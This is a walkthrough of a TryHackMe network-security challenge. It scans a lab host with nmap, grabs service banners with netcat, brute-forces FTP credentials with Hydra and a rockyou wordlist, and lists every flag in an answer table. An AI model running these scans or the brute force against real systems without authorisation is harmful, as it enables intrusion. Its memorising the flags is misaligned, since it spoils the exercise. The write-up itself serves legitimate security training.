

Walkthrough – Nmap, Telnet, and Hydra Challenge
Room link : https://tryhackme.com/room/netsecchallenge

Step 1 – Initial Port Scan
We begin with a full TCP port scan using Nmap to find all open ports:
sudo nmap -p- --min-rate 1000 10.10.108.47

Results:
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
8080/tcp  open  http-proxy
10021/tcp open  unknown

Highest port < 10,000:8080
Port above 10,000:10021
Total open TCP ports:6

Step 2 – Identify Services & Versions

To detect service versions, especially on the unusual port, we run:

sudo nmap -p 10021 -sV 10.10.108.47

This reveals:
10021/tcp open  ftp   vsftpd 3.0.5

FTP version:vsftpd 3.0.5

Step 3 – Get HTTP Server Header Flag

We check HTTP headers on port 80:

nmap -p 80 --script=http-headers 10.10.108.47


We find the server header contains:THM{web_server_25352}

HTTP server header flag:THM{web_server_25352}

Step 4 – Get SSH Server Header Flag

We connect via Netcat to port 22 (SSH):

nc 10.10.108.47 22

The banner reveals:

THM{946219583339}
SSH server header flag:THM{946219583339}

Step 5 – Brute Force FTP Credentials

We know from social engineering that possible usernames are eddie and quinn
We attempt brute forcing with Hydra:

hydra -l quinn -P /usr/share/wordlists/rockyou.txt ftp://10.10.108.47:10021 -t 32

got credentials 
username : quinn ,password:andrea 

Step 6 – Access FTP & Find File Flag

After logging in to FTP:

ftp 10.10.108.47 10021

We list files:

ftp> ls
-rw-rw-r--    1 1002  1002   18 Sep 20  2021 ftp_flag.txt

We download and read:
get ftp_flag.txt
cat ftp_flag.txt
here we got the flag: 
THM{321452667098}

Step 7 – Challenge on Port 8080

Navigating to `http://10.10.108.47:8080` in a browser shows a small challenge.
Solving it reveals:

THM{f7443f99}

Port 8080 challenge flag:THM{f7443f99}

 Final Answers:

| Question                   | Answer                  |
| -------------------------- | ----------------------- |
| Highest open port < 10,000 | 8080                    |
| Open port above 10,000     | 10021                   |
| Total open TCP ports       | 6                       |
| HTTP server header flag    | THM{web\_server\_25352} |
| SSH server header flag     | THM{946219583339}       |
| FTP server version         | vsftpd 3.0.5            |
| FTP account file flag      | THM{321452667098}       |
| Port 8080 challenge flag   | THM{f7443f99}           |

